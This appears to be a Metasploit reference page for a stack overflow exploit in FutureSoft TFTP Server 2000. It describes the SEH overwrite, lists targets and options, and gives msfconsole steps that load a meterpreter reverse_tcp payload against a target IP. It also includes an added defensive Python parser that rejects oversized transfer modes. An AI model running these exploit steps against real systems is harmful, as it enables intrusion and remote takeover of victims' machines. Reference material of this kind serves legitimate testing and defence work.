FutureSoft TFTP Server 2000 Transfer-Mode Overflow
This module exploits a stack buffer overflow in the FutureSoft TFTP Server 2000 product. By sending an overly long transfer-mode string, we were able to overwrite both the SEH and the saved EIP. The write exception that follows transfers execution to our shellcode via the overwritten SEH. This module has been tested against Windows 2000 Professional; for some reason it does not seem to work against Windows 2000 Server (the overflow could not be triggered at all).
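As an added example, not code from the module or from this page: a small Python parser for TFTP read/write requests (RFC 1350) that enforces the length bound and whitelist on the transfer-mode field which a server copying that field into a fixed-size buffer must apply, plus a triage helper run over two constructed datagrams. The packet builder, the constants and the sample filenames are assumptions of this example.

```python
import struct

RRQ, WRQ = 1, 2                    # RFC 1350 opcodes for read/write requests
VALID_MODES = {"netascii", "octet", "mail"}
MAX_MODE_LEN = len("netascii")     # 8: the longest mode RFC 1350 defines
MAX_FILENAME_LEN = 255             # assumed local policy, not an RFC limit

class TftpRequestError(ValueError):
    """Request is malformed or fails a bounds/whitelist check."""

def parse_request(packet: bytes) -> tuple:
    """Parse an RRQ/WRQ into (opcode, filename, mode), checking lengths
    before any field is decoded or copied."""
    if len(packet) < 4:
        raise TftpRequestError("too short for a request")
    (opcode,) = struct.unpack("!H", packet[:2])
    if opcode not in (RRQ, WRQ):
        raise TftpRequestError(f"opcode {opcode} is not RRQ/WRQ")
    # Expect filename, mode, then an empty element after the final NUL.
    fields = packet[2:].split(b"\x00")
    if len(fields) < 3:
        raise TftpRequestError("filename or mode not NUL-terminated")
    filename, mode = fields[0], fields[1]
    if not 0 < len(filename) <= MAX_FILENAME_LEN:
        raise TftpRequestError(f"filename length {len(filename)} out of range")
    if len(mode) > MAX_MODE_LEN:   # reject on length, before decode or copy
        raise TftpRequestError(f"mode length {len(mode)} exceeds {MAX_MODE_LEN}")
    mode_str = mode.decode("ascii", "replace").lower()  # non-ASCII never matches
    if mode_str not in VALID_MODES:
        raise TftpRequestError(f"unknown mode {mode_str!r}")
    return opcode, filename.decode("ascii", "replace"), mode_str

def build_request(opcode: int, filename: bytes, mode: bytes) -> bytes:
    """Assemble a request datagram; used here only to construct sample input."""
    return struct.pack("!H", opcode) + filename + b"\x00" + mode + b"\x00"

def triage(packets):
    """Detector view: 'ok' or the rejection reason for each datagram."""
    results = []
    for pkt in packets:
        try:
            parse_request(pkt)
            results.append("ok")
        except TftpRequestError as exc:
            results.append(f"reject: {exc}")
    return results

# Constructed samples (not captured traffic): a normal read request and
# one whose mode field is far longer than any legitimate value.
SAMPLES = [build_request(RRQ, b"boot.bin", b"octet"),
           build_request(RRQ, b"boot.bin", b"A" * 300)]
```

Running `triage(SAMPLES)` accepts the first datagram and rejects the second on the length check alone, so an oversized mode never reaches a copy into a fixed-size buffer.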
Exploit Rank
- Average
Exploit Authors
- MC <mc [at] metasploit.com>
Vulnerability References
Exploit Targets
- 0 - Windows 2000 Pro English ALL
- 1 - Windows XP Pro SP0/SP1 English
- 2 - Windows NT SP5/SP6a English
- 3 - Windows 2003 Server English
Exploit Development
Similar Exploit Modules
- exploit/windows/tftp/attftp_long_filename
- exploit/windows/tftp/distinct_tftp_traversal
- exploit/windows/tftp/dlink_long_filename
- exploit/windows/tftp/opentftp_error_code
- exploit/windows/tftp/quick_tftp_pro_mode
- exploit/windows/tftp/tftpd32_long_filename
- exploit/windows/tftp/tftpdwin_long_filename
- exploit/windows/tftp/tftpserver_wrq_bof
- exploit/windows/tftp/threectftpsvc_long_mode
Exploit Usage Information
$ msfconsole
msf > use exploit/windows/tftp/futuresoft_transfermode
msf exploit(futuresoft_transfermode) > show payloads
msf exploit(futuresoft_transfermode) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(futuresoft_transfermode) > set LHOST [MY IP ADDRESS]
msf exploit(futuresoft_transfermode) > set RHOST [TARGET IP]
msf exploit(futuresoft_transfermode) > show targets
msf exploit(futuresoft_transfermode) > set TARGET [TARGET ID]
msf exploit(futuresoft_transfermode) > exploit
Exploit Module Options
| Option | Description |
|---|---|
| RHOST | The target address |
| RPORT | The target port (default: 69) |
| CHOST | The local client address |
| CPORT | The local client port |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| DynamicSehRecord | Generate a dynamic SEH record (more stealthy) |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
